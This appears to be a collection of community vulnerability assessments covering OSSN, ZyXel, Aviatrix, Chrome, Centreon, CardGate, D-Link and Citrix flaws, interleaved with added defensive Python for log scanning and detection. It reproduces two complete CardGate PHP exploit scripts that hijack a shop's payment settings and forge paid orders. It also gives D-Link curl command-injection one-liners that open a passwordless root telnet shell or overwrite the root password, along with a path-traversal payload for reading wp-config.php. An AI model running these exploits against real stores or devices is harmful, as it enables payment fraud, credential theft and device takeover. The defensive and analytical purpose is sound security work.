The following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.

Traffic logged from the threat actor’s IP address should be considered suspicious:

  • 77.71.115.52

Attacks in this campaign are issued via GET requests with the following query strings:

  • action=duplicator_download
  • file=/../wp-config.php
  • Note: Because this vulnerability can be exploited via WP AJAX, it’s possible to exploit via POST request. In this case, it’s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.
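Added example tying together the BIG-IP TMUI request paths quoted above and the Duplicator indicators in this post (example code, not from either vendor or advisory): an access-log check that flags `..` segments hidden behind `;` path parameters, which a servlet container strips before resolving the path while a front end matching access rules on the raw path does not, and `..` inside query values such as `file=`, which the note above says remains visible even when the action parameter moves into a POST body. The log lines and client IPs are constructed.

```python
from urllib.parse import parse_qs, unquote, urlsplit


def hidden_dotdot_segments(path: str):
    """Return raw segments that become '..' once ';path-params' are stripped.

    A servlet container removes ';...' from every segment before normalising,
    so 'login.jsp/..;/x' reaches the back end as 'x'. A front-end proxy that
    matches its access rules on the raw path sees a literal directory named
    '..;' and never steps back, which is the disagreement behind the bypass."""
    return [seg for seg in path.split("/")
            if seg != ".." and seg.split(";", 1)[0] == ".."]


def servlet_view(path: str) -> str:
    """Path as the servlet container resolves it: params stripped, '..' applied."""
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)


def traversal_findings(target: str):
    """Inspect one request target (path plus query) and return the reasons it
    looks like a traversal attempt; an empty list means nothing was found."""
    parts = urlsplit(target)
    path = unquote(parts.path)                     # decode %2e%2e%3b etc. once
    findings = []
    hidden = hidden_dotdot_segments(path)
    if hidden:
        findings.append(
            f"'..' hidden behind path parameters {hidden}; servlet container "
            f"resolves {parts.path} to {servlet_view(path)}")
    query = parse_qs(parts.query, keep_blank_values=True)
    for key, values in query.items():
        for value in values:
            if ".." in value:
                findings.append(f"'..' in query parameter {key}={value}")
    if "duplicator_download" in query.get("action", []):
        findings.append("Duplicator download action in query string")
    return findings


def scan_log(lines):
    """Yield (target, findings) for each log line that triggers a finding.
    Assumes the common log format, where the request is the double-quoted field."""
    for line in lines:
        try:
            request = line.split('"')[1]
        except IndexError:
            continue
        fields = request.split(" ")
        if len(fields) < 2:
            continue
        findings = traversal_findings(fields[1])
        if findings:
            yield fields[1], findings


# Constructed access-log lines: the request paths are the ones quoted in the
# BIG-IP and Duplicator assessments above; client IPs are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2020:10:00:00 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 2410',
    '192.0.2.10 - - [01/Jul/2020:10:00:01 +0000] "GET /tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 2410',
    '192.0.2.11 - - [01/Jul/2020:10:00:02 +0000] "GET /tmui/login.jsp;jsessionid=ABC123 HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jul/2020:10:00:03 +0000] "GET /?action=duplicator_download&file=/../wp-config.php HTTP/1.1" 200 3021',
    '192.0.2.12 - - [01/Jul/2020:10:00:04 +0000] "POST /?file=/../wp-config.php HTTP/1.1" 200 3021',
    '192.0.2.13 - - [01/Jul/2020:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 1200',
]


def flagged_targets():
    """Targets from SAMPLE_LOG that produced at least one finding."""
    return [target for target, _findings in scan_log(SAMPLE_LOG)]
```

A legitimate `;jsessionid=` path parameter is not flagged, since only a segment that turns into `..` after stripping counts.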
3
Ratings
Technical Analysis

This was my first CVE :)

This is an Unauthenticated Arbitrary File Read vulnerability in all versions of The Open Source Social Network prior to 5.3. This includes the Open source and commercial versions.

Attacker value stays low as there is not a large population using this application ~ 500,000 downloads and the first phase of the attack can take several hours.

Phase 1: You need the Site Key. The site key is cryptographically weak and if you can get any ciphertext you can recover the key in less than 14 hours on a standard laptop.
If you are unable to gain access as a standard user you can get crypto material from other locations but the PoC is designed for the user strings.

Once the Site Key has been recovered you can use the python script to read any file (in the context of the application) from disk. This includes database credentials and site configurations that can allow for admin access to the site. From here you can gain a full shell using a PHP plugin upload.

Full details can be found at https://techanarchy.net/pages/blog/cve-2020-10560-ossn-arbitrary-file-read

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

This plugin is currently listed as having over 5000 active installations and a little over 3 hundred thousand downloads.

The ability to add an XSS payload is only available when creating or updating calendars, which is an admin-level feature. This means it is unlikely to be valuable to an attacker, as if they already have this level of access there are more damaging attacks that can be performed.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

This affects products that are designed for Small – Medium enterprise more than home users so it is likely to have a higher value to an attacker.
As some of these devices, like firewalls, are designed to operate at the network perimeter, it is fairly simple to identify vulnerable products.

The exploit is an unauthenticated remote code execution attack that leads to full root-level access on the affected device. This level of access can be used to pivot into the internal network or in the case of Firewall products it could be used to alter or intercept traffic from inside the organisation.

Exploit code has been seen for sale and not publicly released; however, the patches are now available, so it is possible to reverse engineer the location of the exploit using information from the advisory and access to the firmware.

Additionally, ZyXel has devices that are no longer supported and will not receive a patch. Full details of affected products and patches can be found on their website.

https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml

Details on the reporting and identification can be found – https://krebsonsecurity.com/tag/cve-2020-9054/

1
Ratings
Technical Analysis

VPN clients are commonly found on laptops for remote office workers. This is a local priv esc on all Aviatrix VPN Clients. As it is local it would need either a malicious user or an attacker with user-level access looking to escalate.

When the VPN client starts it creates a locally running web service. This service is capable of running commands in the context of the service, which runs with root/admin-level permissions.

The service uses a set of certificates to authenticate the web service; however, these certificates are included in a compiled Python executable. It is trivial to recover these certificates and therefore execute commands to gain elevated privileges.

https://immersivelabs.com/2019/12/04/aviatrix-vpn-client-vulnerability/

1
Ratings
Technical Analysis

VPN clients are commonly found on laptops for remote office workers. This is a local priv esc on all Aviatrix VPN Clients. As it is local, it would need either a malicious user or an attacker with user-level access looking to escalate.

Due to file permissions on scripts that are executed to start and stop the VPN client, it is trivial to inject arbitrary OS commands that can be used to escalate privs.

https://immersivelabs.com/2019/12/04/aviatrix-vpn-client-vulnerability/

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very Low
Technical Analysis

This is an RCE in the Chrome JavaScript engine. There are proofs of concept that target both Linux and Windows environments.

The existing POCs are not chained with a Sandbox escape which makes successful exploitation just using the existing code impractical.

The current CVE lists any version of Chrome below 80.0.3987.122 as vulnerable. During testing, the existing POC would not exploit on versions below 80. This is likely to do with the way the exploit is constructed to target the specific test environment rather than older versions not being vulnerable.

From an attacker perspective, if this exploit could be chained with a sandbox escape it could be very valuable for Watering Hole attacks.

Google Chrome's automated update system should protect most users; however, organisations with version-pinned installations may be at a higher risk.

Resources:

Edited: To correct upper version number

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Low
Technical Analysis

Centreon is an open source centralised IT management solution. When installed in a corporate network it is used to query all other devices. This makes it a high-value target for attackers for several reasons:

  • Source of all networked devices and configuration.
  • Could be used to pivot across the network.
  • Use as a staging/beachhead host, as it is expected to talk to other devices on the network.

There is no indication of an active userbase from the product's website. The official GitHub repository has no more than a few hundred stars and forks.
A quick Shodan search reveals around 40 internet-facing applications.

This vulnerability appears to be post exploitation so an attacker would require either valid credentials or the ability to launch a password attack against the target.

The publicly listed blog post https://code610.blogspot.com/2020/02/postauth-rce-in-centreon-1910.html includes steps to reproduce but doesn’t provide a PoC script. That being said, it would be trivial with a few lines of Python to create a simple PoC script.
The only tested version was 19.10.

At the time of writing there does not appear to be any official patch and the website is still serving vulnerable versions. Whilst a full review has not been completed, a check of the GitHub repo suggests that all versions are potentially vulnerable.

8

I am still reviewing this in my lab environment; however, you marked this as difficult to patch. From the ZDI writeup I assume just changing the keys is enough to mitigate.

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This is related to https://attackerkb.com/topics/cve-2020-8819. It is the same plugin for a different platform and is vulnerable to the same

Magento does not provide an indication of how many websites have the plugin installed, but using WooCommerce as a guide it is expected to be relatively low, ~500 installs.

POC code is available in the GitHub repo as part of the disclosure and is replicated at the end of this analysis for convenience.

At the time of this analysis, the Magento Marketplace was still serving a vulnerable version, 2.0.30: https://marketplace.magento.com/cardgate-magento2.html

<?php
/*
  Usage:

  1. Change values of the constants (see below for TARGET & ORDER*)
  2. Host this script somewhere (must be public accessible)
  3. Register a merchant at https://cardgate.com
  4. Sign into "My CardGate" dashboard
  5. Add fake site or choose existing one
  6. Click "Setup your Webshop" button in site preferences
  7. Paste the URL of this script into the pop-up window and click "Save"
  8. The target store now uses the settings of your site, enjoy :]

  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sToken_ 
 * @param bool $bTestmode_ 
 * @return string
 */
function pullConfig($sToken_, $bTestmode_ = FALSE) {
	if (!is_string($sToken_)) {
		throw new Exception('invalid token for settings pull: ' . $sToken_);
	}

	$sResource = "pullconfig/{$sToken_}/";
	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_URL, $sUrl);
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
		'Content-Type: application/json',
		'Accept: application/json'
	]);
	if ($bTestmode_) {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
	} else {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
	}

	if (FALSE == ($sResults = curl_exec($rCh))) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}
	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
		throw new Exception('remote gave invalid JSON: ' . $sResults);
	}
	if (isset($aResults['error'])) {
		throw new Exception($aResults['error']['message']);
	}

	return $aResults;
}

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sUrl 
 * @param array $aData_ 
 * @param string $sHttpMethod_ 
 * @return string
 */
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
		throw new Exception('invalid http method: ' . $sHttpMethod_);
	}

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

	if ('POST' == $sHttpMethod_) {
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
		curl_setopt($rCh, CURLOPT_POST, TRUE);
		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
	} else {
		$sUrl = $sUrl
			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
			. http_build_query($aData_)
		;
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
	}

	$response = curl_exec($rCh);
	if (FALSE == $response) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}

	return $response;
}

if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
	try {
		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
		$aConfigData = $aResult['pullconfig']['content'];
		$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
		if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
			if (ORDER) {
				$payload = [
					'testmode' => $_REQUEST['testmode'],
					'reference' => ORDER,
					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
					'currency' => ORDER_CURRENCY,
					'amount' => ORDER_AMOUNT * 100,
					'status' => 'success',
					'code' => 200,
					'pt' => ORDER_PAYMENT_TYPE
				];
				$payload['hash'] = md5(
					(!empty($payload['testmode']) ? 'TEST' : '')
					. $payload['transaction']
					. $payload['currency']
					. $payload['amount']
					. $payload['reference']
					. $payload['code']
					. $aConfigData['site_key']
				);
				$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
				if ($response == $payload['transaction'] . '.' . $payload['code']) {
					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
				} else {
					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
				}
			} else {
				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
			}
		} else {
			throw new Exception("It seems target is not vulnerable ($response)");
		}
	} catch (\Exception $oException_) {
		die(htmlspecialchars($oException_->getMessage()));
	}
}

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This is for a specific plugin for WooCommerce, not WooCommerce itself. This plugin has a relatively small number of installs so it is not likely to see large scale use.

There is a public POC attached to the GitHub repo and duplicated at the end of this analysis for convenience. Authenticated access is not required. https://github.com/cardgate/woocommerce/issues/18

<?php
/*
  Usage:

  1. Change values of the constants (see below for TARGET & ORDER*)
  2. Host this script somewhere (must be public accessible)
  3. Register a merchant at https://cardgate.com
  4. Sign into "My CardGate" dashboard
  5. Add fake site or choose existing one
  6. Click "Setup your Webshop" button in site preferences
  7. Paste the URL of this script into the pop-up window and click "Save"
  8. The target store now uses the settings of your site, enjoy :]

  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', 0); // provide non-zero value to automagically spoof order status
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sToken_ 
 * @param bool $bTestmode_ 
 * @return string
 */
function pullConfig($sToken_, $bTestmode_ = FALSE) {
	if (!is_string($sToken_)) {
		throw new Exception('invalid token for settings pull: ' . $sToken_);
	}

	$sResource = "pullconfig/{$sToken_}/";
	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_URL, $sUrl);
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
		'Content-Type: application/json',
		'Accept: application/json'
	]);
	if ($bTestmode_) {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
	} else {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
	}

	if (FALSE == ($sResults = curl_exec($rCh))) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}
	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
		throw new Exception('remote gave invalid JSON: ' . $sResults);
	}
	if (isset($aResults['error'])) {
		throw new Exception($aResults['error']['message']);
	}

	return $aResults;
}

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sUrl 
 * @param array $aData_ 
 * @param string $sHttpMethod_ 
 * @return string
 */
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
		throw new Exception('invalid http method: ' . $sHttpMethod_);
	}

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

	if ('POST' == $sHttpMethod_) {
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
		curl_setopt($rCh, CURLOPT_POST, TRUE);
		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
	} else {
		$sUrl = $sUrl
			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
			. http_build_query($aData_)
		;
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
	}

	$response = curl_exec($rCh);
	if (FALSE == $response) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}

	return $response;
}

if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
	try {
		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
		$aConfigData = $aResult['pullconfig']['content'];
		$response = doRequest(TARGET, $_REQUEST);
		if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') {
			if (ORDER) {
				$payload = [
					'testmode' => $_REQUEST['testmode'],
					'reference' => random_int(10000000000, 99999999999) . ORDER,
					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
					'currency' => '',
					'amount' => 0,
					'status' => 'success',
					'code' => 200
				];
				$payload['hash'] = md5(
					(!empty($payload['testmode']) ? 'TEST' : '')
					. $payload['transaction']
					. $payload['currency']
					. $payload['amount']
					. $payload['reference']
					. $payload['code']
					. $aConfigData['site_key']
				);
				$response = doRequest(TARGET . '/?cgp_notify=true', $payload);
				if ($response == $payload['transaction'] . '.' . $payload['code']) {
					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
				} else {
					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
				}
			} else {
				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
			}
		} else {
			throw new Exception("It seems target is not vulnerable ($response)");
		}
	} catch (\Exception $oException_) {
		die(htmlspecialchars($oException_->getMessage()));
	}
}
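
The two CardGate PoCs above (Magento and WooCommerce) share one flaw: the store's payment callback accepts an unauthenticated site-setup request, pulls the merchant settings behind whatever CardGate token the request names, and from then on verifies payment notifications with the site_key from that configuration. The following Python model is an added example, not the plugin's code or the PoC author's; the token names, merchant IDs, keys and order number are constructed, and `pull_config` stands in for the SDK call to the CardGate API so it runs offline. The hash is built exactly as the PoC builds it. `HardenedStore` is one possible mitigation (requiring an authenticated administrator for site setup), not the vendor's patch:

```python
import hashlib


def cardgate_hash(testmode, transaction, currency, amount, reference, code, site_key):
    """Notification hash exactly as the PoC builds it: MD5 over the concatenated
    fields, prefixed with 'TEST' when testmode is set."""
    prefix = "TEST" if testmode else ""
    data = f"{prefix}{transaction}{currency}{amount}{reference}{code}{site_key}"
    return hashlib.md5(data.encode()).hexdigest()


# Constructed sample data (hypothetical tokens and keys). A CardGate token
# resolves to the site configuration of whoever registered it, so the attacker
# owns everything behind "attacker-token".
CARDGATE_ACCOUNTS = {
    "shop-token": {"merchant": "1001", "site_id": "1", "site_key": "shop-secret-key"},
    "attacker-token": {"merchant": "9999", "site_id": "7", "site_key": "attacker-key"},
}


def pull_config(token, testmode=False):
    """Offline stand-in for the SDK's pullConfig() call to the CardGate API."""
    if token not in CARDGATE_ACCOUNTS:
        raise KeyError("invalid token for settings pull")
    return dict(CARDGATE_ACCOUNTS[token])


class VulnerableStore:
    """Model of the plugin callback as the PoC drives it (not the plugin's code)."""

    def __init__(self, token="shop-token"):
        self.config = pull_config(token)
        self.orders = {"000000001": "pending"}

    def site_setup(self, params):
        # The flaw: an unauthenticated request carrying cgp_sitesetup and a token
        # makes the store adopt the merchant settings behind that token.
        cfg = pull_config(params["token"], params.get("testmode", False))
        self.config = cfg
        return f"{cfg['merchant']}.{cfg['site_id']}.200"

    def notify(self, p):
        # The hash check is sound in isolation; it is only as secret as site_key.
        expected = cardgate_hash(p["testmode"], p["transaction"], p["currency"],
                                 p["amount"], p["reference"], p["code"],
                                 self.config["site_key"])
        if p["hash"] != expected:
            return "hash mismatch"
        if p["code"] == 200 and p["status"] == "success":
            self.orders[p["reference"]] = "paid"
        return f"{p['transaction']}.{p['code']}"


class HardenedStore(VulnerableStore):
    """One mitigation (an assumption, not the vendor's patch): changing the site
    configuration requires an authenticated store administrator."""

    def site_setup(self, params, is_admin=False):
        if not is_admin:
            raise PermissionError("site setup requires an authenticated admin")
        return super().site_setup(params)


def forge_payment(store, reference, amount_cents=100, currency="USD", testmode=False):
    """Attacker flow from the PoC: swap in the attacker's site config, then send a
    'success' notification signed with the attacker's own site_key."""
    try:
        store.site_setup({"cgp_sitesetup": "1", "token": "attacker-token"})
    except PermissionError:
        pass  # hardened store refused; the attacker is left guessing the real key
    key = CARDGATE_ACCOUNTS["attacker-token"]["site_key"]
    payload = {
        "testmode": testmode, "reference": reference, "transaction": "T00000000001",
        "currency": currency, "amount": amount_cents, "status": "success", "code": 200,
    }
    payload["hash"] = cardgate_hash(testmode, payload["transaction"], currency,
                                    amount_cents, reference, 200, key)
    return store.notify(payload)


if __name__ == "__main__":
    shop = VulnerableStore()
    print(forge_payment(shop, "000000001"), shop.orders)   # order flips to "paid"
    shop = HardenedStore()
    print(forge_payment(shop, "000000001"), shop.orders)   # stays "pending"
```

Against the vulnerable model the forged notification is accepted because the store itself handed over the key it checks against; against the hardened model the same notification fails the hash check because the shop's own site_key was never replaced. The amount is passed in cents, matching the `ORDER_AMOUNT * 100` in the PoC.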
2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Low
Technical Analysis

This analysis is a transcript of a public gist. Original source: https://gist.github.com/jezzaaa/9d704400a7e23f988dfb4f73658678b8

D-Link DCH-M225 1.04 devices allow authenticated admins to execute arbitrary OS commands via shell metacharacters in the media renderer name.


[Additional Information]
The vendor has stated that the device has been discontinued (as of April 2018), and that they won’t be patching.

I have requested the vendor confirm the exploit. They have not responded to this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Attack Type]
Local


[Attack Vectors]
Log in to the admin console (as admin), then set the “media renderer” name to a string containing a single-quoted arbitrary command prepended by a semicolon, such as telnetd. The command runs as root.


[Reference]
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152
https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender
https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
https://www.dlink.com/en/security-bulletin

4
Ratings
Technical Analysis

This analysis is a transcript of a public gist. Original source: https://gist.github.com/jezzaaa/38c752d0a129576b2cc523ce6325050f

D-Link DCH-M225 1.04 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the spotifyConnect.php userName parameter.


[Additional Information]
From the local network (e.g. wifi), access the URL http://ip-address/spotifyConnect.php with POST variables:

action=addUser userName=;/usr/sbin/telnetd -i br0 >/dev/null &;

For example, from a Linux command line:

curl -d 'action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;' http://192.168.0.50/spotifyConnect.php

This starts a telnet daemon that provides a root shell with no password. Then telnet to the device for a root shell.

The same exploit can be used to temporarily change the root password, using something like:

curl -d 'action=addUser&userName=;echo "\"Admin\" \"\" \"0\"">/var/passwd.new;' http://192.168.1.204/spotifyConnect.php

This exploit would also work on a network that exposes port 80 on the device to the Internet, in which case this would allow a remote root shell to an unprivileged user.

The vendor has stated that the device has been discontinued (as of April 2018), and that they won’t be patching.

The vulnerable “Spotify Connect” feature of the product may have been implemented on other devices that are still for sale or still under support, possibly using the same vulnerable code implemented in spotifyCode.php on this device. The vendor has been asked if any of their other products use the same code, but they did not answer this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Affected Component]
script spotifyConnect.php


[Attack Type]
Local


[Attack Vectors]
Submit an HTTP request to add a Spotify Connect user (no admin auth required), using a username containing a semicolon followed by an arbitrary command (which runs as root) such as telnetd or commands to modify the admin user’s password.


[References]
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152
https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender
https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
https://www.dlink.com/en/security-bulletin
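
The spotifyConnect.php handler itself is not on the page, so the following Python is an added example of the bug class the advisory describes, not the device's code: a handler that splices the userName parameter into a shell command line, the hardened form that allowlists the value and passes it as a separate argument with no shell, and a detection rule for request logs. The request bodies are constructed (two of them reproduce the advisory's payloads verbatim, the third only echoes a marker so the vulnerable form can be demonstrated safely), and `ADD_USER_CMD` is a harmless stand-in for whatever the firmware actually runs:

```python
import re
import shlex
import subprocess
from urllib.parse import parse_qs

# Constructed request bodies: a benign user, the two payloads quoted in the
# advisory above (telnetd and the password overwrite), and a harmless
# demonstration payload that only echoes a marker.
BENIGN_BODY = "action=addUser&userName=alice"
TELNETD_BODY = "action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;"
PASSWD_BODY = 'action=addUser&userName=;echo "\\"Admin\\" \\"\\" \\"0\\"">/var/passwd.new;'
DEMO_BODY = "action=addUser&userName=;echo INJECTED;"

# Harmless stand-in for whatever the firmware runs to add a Spotify Connect
# user; the real handler lives in spotifyConnect.php and is not reproduced here.
ADD_USER_CMD = "echo adduser"


def _username(body):
    return parse_qs(body, keep_blank_values=True).get("userName", [""])[0]


def vulnerable_add_user(body):
    """Interpolates userName straight into a shell command line, the bug class
    the advisory describes: metacharacters in the parameter are run by /bin/sh."""
    result = subprocess.run(f"{ADD_USER_CMD} {_username(body)}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def hardened_add_user(body):
    """Allowlists the value and passes it as its own argv element with no shell,
    so the parameter can never become shell syntax."""
    user = _username(body)
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("invalid userName")
    result = subprocess.run(shlex.split(ADD_USER_CMD) + [user],
                            capture_output=True, text=True)
    return result.stdout


def hardened_rejects(body):
    """True when the hardened handler refuses the request."""
    try:
        hardened_add_user(body)
    except ValueError:
        return True
    return False


def looks_like_injection(body):
    """Detection rule for proxy or web-server logs of spotifyConnect.php
    requests: flag shell metacharacters in userName."""
    return bool(re.search(r"[;&|`$<>\n]", _username(body)))


if __name__ == "__main__":
    print(repr(vulnerable_add_user(DEMO_BODY)))   # 'adduser\nINJECTED\n'
    print(repr(hardened_add_user(BENIGN_BODY)))   # 'adduser alice\n'
    for body in (BENIGN_BODY, TELNETD_BODY, PASSWD_BODY):
        print(looks_like_injection(body), hardened_rejects(body), body)
```

Note that the detection regex is deliberately broad: on a device with no patch available, anything other than a plain alphanumeric username hitting spotifyConnect.php is worth an alert, and the same rule applied at a perimeter proxy is the only control left for the Internet-exposed case the advisory mentions.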

6
Ratings
Technical Analysis

Like some others have said, this requires an understanding of your target's host devices in order to generate a reliable exploit. This involves identifying the start address of the NonPagedPool and plugging this into the existing Metasploit module.

With a large number of cloud-based resources this is perhaps a little easier to exploit than enterprise desktops.

An example against AWS-hosted Windows appliances works something like this.

  • Spin up your own AWS Instance.
  • Use Memory Dump tool like WinPMem to grab a memory image.
  • Transfer mem dump to a machine running the rekall memory forensics tool
  • Run the pools plugin to get the address.

This offset will work against any instance in this region started from that same base AMI.


3
Ratings
Technical Analysis

This appliance is targeted towards small to medium enterprises, which means it is more valuable to an attacker than attacks against home user equipment.

If compromised, access to this device could be used to perform network-level compromise via DNS attacks or reveal sensitive information about the network.

It requires local network access in order to exploit the vulnerability. This device lists “Guest access control” as one of its features, so depending on its configuration local access may be available.

Devices like APs and embedded devices are often overlooked when applying security updates and patches.

At the time of analysis, there is no firmware update available to remediate the vulnerability although POC code does not yet appear to be publicly available.

Despite the absence of available POC code, it is trivial to download the firmware and extract the file system. A determined attacker could then identify the exploit manually.

6
Ratings
Technical Analysis

AWS had pre-built AMIs for these appliances, built and supplied to the Marketplace by Citrix.

At the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.

If you use this kind of setup it is important to remove any old AMIs and replace them; do not assume that patches will be applied to existing AMIs.

4
Ratings
Technical Analysis

Current PoCs offer unauthenticated LFI inside the webroot.
Depending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.

There is the potential for RFI / RCE, although examples of this are not yet public.

